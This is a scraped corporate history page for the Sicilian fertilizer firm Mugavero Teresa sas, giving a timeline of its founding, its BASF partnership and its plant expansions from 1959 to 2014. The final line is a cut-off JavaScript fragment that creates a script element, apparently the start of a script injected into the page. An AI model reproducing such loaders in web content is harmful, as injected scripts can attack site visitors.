Menu

We are apologize for the inconvenience but you need to download
more modern browser in order to be able to browse our page

Download Safari
Download Safari
Download Chrome
Download Chrome
Download Firefox
Download Firefox
Download IE 10+
Download IE 10+

STORIA

1959 - 2015

Fondazione della Società

1959

Fondazione della La società Mugavero Teresa sas come partner di Montedison Spa e Enichem Spa. La società nasce per distribuire fertilizzanti tradizionali in Sicilia.

.

Partnership

2000

Partnership con la multinazionale BASF per la costruzione di un impianto di miscelazione e sintesi del DMPP (dimetil-pirazolo-fosfato), il risultato oggi è il Complesal e si costruisce una seconda linea di insacco a bobina.

Crescita

2005

Miglioramento dell impianto di Npk tramite un dry system che permette di rendere unici i prodotti Mugavero: essi non sono soggetti a impaccamento.

Estensione

2013

Costruzione impianto produzione Urea Fosfato

Costruzione Impianti

1985

Costruzione presso magazzini di termini imerese del primo impianto di stoccaggio e confezionamento di fertilizzanti acquistati alla rinfusa tramite navi dall’ estero per la distribuzione in Sicilia e in tutta il Sud Italia.

Internazionalizzazione

2004

Costruzione dell’ impianto di produzione di npk idrosolubili tra i più grandi in Europa e aggiunzione della prima linea di insacco a foglia. Comincia l’ internazionalizzazione della società. Si iniziano a vendere i prodotti speciali Mugavero nei paesi del Mediterraneo.

Espansione

2008

Costruzione di un impianto di granulazione di misti azotati con inibitore NBBT(AUREA 46) e aggiunzione della seconda e terza linea di insacco a foglia. La società si espande anche nei paesi del Medio Oriente

Innovazione

2014

Costruzione impianto di produzione fertilizzante GEL e della prima linea di confezionamento di sacchi in raffia.

var d=document;var s=d.createElement(‘script’);